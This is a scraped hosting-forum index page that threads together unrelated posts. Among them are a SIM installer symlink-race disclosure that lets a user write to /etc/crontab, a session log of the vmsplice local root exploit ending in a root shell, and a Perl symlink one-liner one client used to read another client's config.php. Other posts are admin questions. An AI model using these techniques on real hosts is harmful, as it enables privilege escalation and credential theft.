SIM Installer Symlink Attack + Race Condition Local Root Vulnerability
Apr 29, 2007
Code:
$ md5sum sim-current.tar.gz
6c1cece6f3af87598c4bdb09cabcb3cc sim-current.tar.gz
Line 25, file: sim-2.5-3/setup
Code:
TMPS="/tmp/sim_cj"
Line 399, file sim-2.5-3/install/sim
Code:
cat $TMPS >> /etc/crontab
If a local user creates a symlink to that file, then writes to the sim_cj file being linked to, as SIM is being installed, they can influence the contents of /etc/crontab.
Contacted the vendor via email on 04/17/07, email bounced.
Opened a ticket via their helpdesk ~5 days ago, no response.
Again, this is only an issue during the install, which is an extremely small window of time. Any bug that could lead to root access should be fixed, however.
View 0 Replies
ADVERTISEMENT
Oct 30, 2009
I'm planning a website at the moment but I'm wondering about a slight issue, regarding the local root folder of a website.
Currently, I'm using Dreamweaver to create a website and I have had no problems of uploading my files to a site through Dreamweaver before. But I will not have access to my computer for about one month every year. However, I have a laptop available during that month. But since my local root folder is located on my stationary computer it seems impossible for me to, in any way, use that laptop to manage my site (upload new files to the server).
View 0 Replies
View Related
Nov 2, 2009
I'm planning a website at the moment but I'm wondering about a slight issue, regarding the local root folder of a website.
Currently, I'm using Dreamweaver to create a website and I have had no problems of uploading my files to a site through Dreamweaver before. But I will not have access to my computer for about one month every year. However, I have a laptop available during that month. But since my local root folder is located on my stationary computer it seems impossible for me to, in any way, use that laptop to manage my site (upload new files to the server).
View 3 Replies
View Related
Feb 10, 2008
Get ready for another round of patching and reboots. See:
[url]
Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1
Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of couple days ago, but I'm not sure if it's still vulnerable. Seems like it is.
luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#
View 15 Replies
View Related
Sep 22, 2007
on one my root server runs a DDOS attack, apparently from a Botnet, however all have the same Referer. Who can give me Tipps, how I can prevent the attacks? Preferably evenly stop over the Referer?
View 6 Replies
View Related
Mar 11, 2015
I am looking for a way to put a rewrite condition into my configuration where I can poll an external web page and based on the http status code, allow the rewrite or not.
I am doing this in order to set a maintenance status on two different proxy servers, one is apache the other is a big-ip. I already have the maintenance pages and control setup on the big-ip, but I need a way to poll a url and pull a specific http status code served up by the big-ip.
View 3 Replies
View Related
Aug 21, 2006
malware acl condition: clamd: connection to 127.0.0.1, port 3310 failed (Bad file descriptor)
This is a normal Cpanel FC3 exim/clamav server.
Has anyone come across this annoying yet little error?
View 6 Replies
View Related
Aug 15, 2008
i have big problem all Forums in my server hacked by perl symlink see all config.php by shell perl in .txt by include
i solve it by make perl permission 000 but all thing in cpanel stop cause cpanel by perl
View 6 Replies
View Related
Jun 28, 2007
I'm trying to create a symlink (ln -s) in SSH with the goal of having a php-file to be able to be reached from my wildcard subdomains "username.domain.com". The reason is because of XMLHttpRequest that resides in the php-file. When trying to access it from username.domain.com I only get an error, because of the cross-domain issue.
Anyway, I got the suggestion of creating a symlink on the file system, but I can't really get the symlink right... Where should I place it on the file system?
This is the path to the script;
Code:
/home/web2753/domains/domain.com/public_html/ajax/status.php
I tried creating the symlink in various places, like in the /domains/ directory;
Code:
ln -s /home/web2753/domains/domain.com/public_html/ajax/status.php
But I don't seem to get it right! If I have understood everything correctly, I'm supposed to create a symlink for status.php so the Subdomains can access it as if it was placed directly under the subdomains.
This is what my .JS file looks like (with the XMLhttprequest, this might not matter..?)
Code:
/home/web2753/domains/domain.com/public_html/javascript/edit.js
Code:
var cururl = 'htp domain com'; // this forum didn't like this url?
function createRequestObject() {
var req;
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
} else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
} else {
alert('Problem creating the XMLHttpRequest object');
}
return req;
}
function handleDivTag(divtag) {
var divtag;
return divtag;
}
var http = createRequestObject();
var divhandler = new handleDivTag(null);
function sendRequest(ua_id,show,series) {
http.open('get', cururl+'ajax/status.php?ua_id='+ua_id+'&show='+show+'&series='+series+'&dummy=' + new Date().getTime());
http.onreadystatechange = handleResponseTwo;
divhandler.divtag = ua_id;
http.send(null);
}
function handleResponseTwo() {
if (http.readyState == 4 && http.status == 200) {
var response = http.responseText;
if (response) {
document.getElementById('editinfo'+divhandler.divtag).innerHTML = response;
}
}
}
Everything works except of the cross-domain issue which I'm trying to overcome by creating a symlink.
View 1 Replies
View Related
Jul 5, 2009
I’ve been working on a project for weeks and I can not solve this, hope you can give me an idea. I am working on a dedicated server, and I need to create some symlinks between different accounts and users...
Both accounts are on the same partition of the server (home) and I have root access and SSH access for everything.
If I create a symlink to a directory of another account and on that directory there is any HTML file (e.g. Index.html), that symlink works great and it shows the content on that file.
HOWEVER if the symlink targets to a directory in which there is a file in (e.g. Index.php) or any script programmed in PHP (e.g. Joomla) it does not work and gives...
“Internal Server Error” + Additionally, a 404 Not Found error was encountered...
When I go to Cpanel the “error log” says...
[Sun Jul 05 09:15] [error] [client zz] File does not exist: /home/zzz/public_html/ 500 shtml
[Sun Jul 05 09:15] [error] [client zz] SoftException in Application.cpp:367: Mismatch between target UID (123) and UID (123) of file "/home/zzz/public_html/my-dir/my-symlink/ index php"
However, If go to SSH and edit server owner of the symlink, so both symlink and target file has the same owner (chown user:user directory_name) the problem is the same, but on the “error log” the UID Mismatch disappear and I only find...
File does not exist: /home/zzz/public_html/500 shtml
I’ve also tried modifying suexec by changing... “domain . tld ” for “domain - tld ” on the server alias, and does not work.
Here I give you more info about server file structure...
serveralias generation path...
/var/cpanel/userdata/USER/DOMAIN
suexec location...
/usr/local/apache/sbin/suexec
Server Information
System Linux
Apache Version 2.2.11 (Unix)
PERL Version 5.8.8
PHP Version 5.2.8
So the question is... HOW can I create a symlink between different users on the same dedicated server partition, that target to PHP scripts or how can I allow the server to execute PHP scripts through symlinks of different accounts?
View 2 Replies
View Related
Jun 29, 2008
A client hacked another client of mine using the following Perl code:
#!/usr/bin/perl
symlink ("/home/john/public_html/config.php","/home/carole/public_html/forums/includes/config.php");
After the hacker got the DB name, username and password it's very easy to change anything in the forum using PHP.
I'm using cPanel.
View 1 Replies
View Related
May 12, 2015
I installed Apache2. In the the folder "var/www/html" I created a symlink to a different HDD that holds a number of movie files. My thinking is that it would be easy to access the movies through a browser from any computer on my local network.
I used the following command string while in the html directory, and created the symlink:
ln -sd /media/guy/movie1/Movies test
While sitting at the server, when I click on "test" it opens the correct directory and exposes the files. If I surf to apache from another machine it does not show the symlink.
Here the permissions on the symlink
lrwxrwxrwx 1 root root 24 May 11 19:56 test -> /media/guy/movie1/Movies
Excerpt from Apache access log:
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:50:38 -0400] "GET / HTTP/1.1" 200 584 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:50:39 -0400] "GET /icons/blank.gif HTTP/1.1" 304
View 1 Replies
View Related
Nov 18, 2008
This security flaw came to light at the end of October and I didn't find it posted already so thought it worth mentioning having tested the helpdesks for some sites that we use and found them to be at risk.
D
etails and a demo exploit URL can be found at url]
For anyone who doesn't know, XSS flaws that allow execution of arbitrary javascript can be exploited easily and without user knowledge to obtain information such as login details or session IDs. This could happen in various ways, including visiting an unrelated page with a simple URL that redirects to the vulnerable URL and then back again. Tools such as NoScript for FireFox may help protect against this on the client side.
View 9 Replies
View Related
Jan 14, 2007
A user is able to use WebShell.cgi:
[url removed]
In order to run commands from the /scripts folder. This is especially dangerous as a user can give an account reseller priviledge with full root access.
Because webshell.cgi is running with the uid/gid of apache, it can access all files which can be access with apache. And guess what.... the /scripts folder is one of them.
Because it's a CGI script, it doesn't seem as though there is an easy way to block this.
View 14 Replies
View Related
May 13, 2008
I am building a website which require a data feed from a third party data provider. I have to fill out a 'questionair' when submitting my application and I'm not sure what to put for this questions.
Question: "Have you run a vulnerability assessment of network security? What is the current assessment rating?"
I Google'd for security rating but came up blank, without any useful result. Is there a level like 1-5 or something for network security rating? I m not sure what to put on here.
I'm not against getting a shared/virtual hosting account if the a host could provide me with these ratings.
View 2 Replies
View Related
Mar 13, 2007
[url]
cPanel Multiple Local File Include Vulnerabilities
Bugtraq ID: 22915
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Mar 11 2007 12:00AM
Updated: Mar 12 2007 04:54PM
Credit: cyb3rt & 020 are credited with the discovery of these vulnerabilities.
Vulnerable: cPanel cPanel 10.9 build 134
cPanel cPanel 10.9 build 125
cPanel cPanel 10.9
View 2 Replies
View Related
May 2, 2008
Just came through on the RSS feeds...
Quote:
Several potential security issues have been identified with cPanel software and Horde, a 3rd party bundled application. cPanel releases prior to 11.18.4 and 11.22.2 are susceptible to security issues, which range in severity from trivial to medium-critical. Along with the discovery of these potential issues, cPanel has released a new security tool to provide users with protection from XSRF attacks.
Quote:
All STABLE and RELEASE users are strongly urged to update to their respective 11.18.5 release. CURRENT and EDGE users should update to the latest 11.22.3 release. No releases are deemed susceptible to severe, critical or root access vulnerabilities.
[url]
View 8 Replies
View Related
May 29, 2007
I'm wondering if this is true:
[url]
Something like:
[url]
View 2 Replies
View Related
Apr 10, 2013
We are currently running ColdFusion 9 on an Apache server. After running a Webinspect scan for one of our web applications, a weak cipher vulnerability was flagged as critical. Their recommended change to the httpd.conf file is listed below. We made the change and restarted our server but the same vulnerability came up again. How to eliminate the weak cipher vulnerability?
SSLCipherSuite ALL:!aNull:!ADH:!eNull:!LOW:!EXP:!NULL:RC4+RSA:+HIGH:+MEDIUMÂ
View 3 Replies
View Related
Jun 27, 2013
I am using plesk 11.0.9 and I want disable ssl anonymous authentication. A vulnerability exists in SSL communications when clients are allowed to connect using no authentication algorithm.
How I can disable anonymous authentication
Plesk apache + nginx running
View 2 Replies
View Related
Sep 16, 2007
Attacking multicore CPUs
[url]
[url]
"The Register reports that the world of current multi-core central processing units (CPUs) just entered is facing a serious threat. A security researcher at Cambridge disclosed a new class of vulnerabilities that takes advantage of concurrency to bypass security protections such as anti-virus software The attack is based on the assumption that the software that interacts with the kernel can be used without interference. The researcher, Robert Watson, showed that a careful written exploit can attack in the little timeframe when this happens, and literally change the "words" that they are exchanging. Even if some of these dark aspects of concurrency were already known, Watson proved that real attacks can be developed, and showed that developers have to fix their code. Fast..."
View 0 Replies
View Related
Oct 1, 2014
We have Plesk Panel 11.5 in Virtuozzo containers (Centos 6 x86_64) and we often provide to our customers the ssh access with chroot - /usr/local/ psa/ bin/chrootsh.All we know about Shellshock Vulnerability and we already installed all fixes to bash, but chrootsh-version is still vulnerable.Here are the results of BashCheck from [URL] ..... under chrooted user:
Vulnerable to CVE-2014-6271 (original shellshock)
Vulnerable to CVE-2014-7169 (taviso bug)
bashcheck: line 15: 19226 Segmentation fault bash -c "true $(printf '<<EOF %.0s' {1..79})" 2> /dev/null
Vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer.Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug).Do you plan to release updates for chrootsh?
View 2 Replies
View Related
Jul 18, 2009
I have noticed a cPanel installer bug, where the installers just goes and goes and goes and goes on the Perl install.
root@server [~]# cat /proc/cpuinfo | grep Xeon && cat /proc/cpuinfo | grep MHz
model name : Intel(R) Xeon(R) CPU L5410 @ 2.33GHz
cpu MHz : 2332.664
root@server [~]# free -m
total used free shared buffers cached
Mem: 3034 2263 771 0 96 1933
-/+ buffers/cache: 233 2801
Swap: 2047 0 2047
root@server [~]# ps aux | grep perl | grep -v grep
root 7420 68.7 0.0 13544 1736 pts/0 Rl Jul17 554:26 /usr/bin/expect -- /scripts/expectperlinstaller --force version
root 7422 15.2 0.4 14148 12464 pts/1 Ss+ Jul17 123:17 /usr/bin/perl /scripts/realperlinstaller --force version
root@server [~]# uptime
12:12:58 up 18:29, 3 users, load average: 1.43, 1.42, 1.40
It's been going for 18 hours, still is not done.
I opened a ticket with cPanel and received this:
Quote:
Hiya,
This is a known issue currently, we hope to have a new installer released next week to fix this. This is not a wide-spread issue, and only affects about 2% of our customers. There is a work around for doing this;
1. Install the OS
2. Insure Perl + CPAN are installed
3. Run CPAN once to configure it ( for those unfamiliar with CPANs options,
accepting the defaults will work for most options ).
View 2 Replies
View Related
Feb 6, 2009
I have seen here in the Windows Hosting Forum that some people ask questions about Windows hosting where they would really benefit from a basic understanding of the Microsoft web technology.
Recently on Jan 21, Microsoft made it a trivial process to install all the components needed to "kick the tires" with the "Web Platform Installer"
And I've come across a lot of hosters claiming to provide Windows hosting that could really use some quality time with this stuff!
From the Microsoft web site:
The Web Platform Installer (Web PI) is a simple tool that installs Microsoft's entire Web Platform, including IIS, Visual Web Developer 2008 Express Edition, SQL Server 2008 Express Edition and the .NET Framework. Using the Web Platform Installer’s user interface, you can choose to install either specific products or the entire Microsoft Web Platform onto your computer. The Web PI also helps keep your products up to date by always offering the latest additions to the Web Platform.
New Updates! Now supporting Windows XP and Windows Server 2003, Web PI makes it easy to install and stay up-to-date with the Microsoft Web Platform. This updated release lets you install ASP.NET MVC, Visual Studio Tools for Silverlight, and much more!
[url]
A nicer screen shot:
[url]
View 8 Replies
View Related
Nov 25, 2008
I have read that although chained root ssl certificates can be more difficult to install they are actually more secure since the root certificate cannot be compromised, only the intermediary.
Is this true? It looks like both google and amazon both use chained SGC certs.
View 0 Replies
View Related
Feb 2, 2007
Anyone succeed in using the PHP installer? I tried on a few machines it just keep failing
View 7 Replies
View Related
Mar 17, 2015
Tools & settings > plesk > updates & upgrades.
I tried to open updates & upgrades, with above flow, using the same username and password to log in the panel, on :8443, but the page said the username or password is not valid. attached screenshot....
View 2 Replies
View Related
Apr 11, 2015
I had been wondering why I wasn't getting MU#42 of Plesk 12.0.18 on Ubuntu 14.04.2 LTS (and 12), and I noticed this when running apt-get update (just after running autoinstaller from UI)...
Reading package lists... Done
W: GPG error: http://autoinstall.plesk.com trusty InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 22738D6AF741DEBClick to expand...
View 19 Replies
View Related
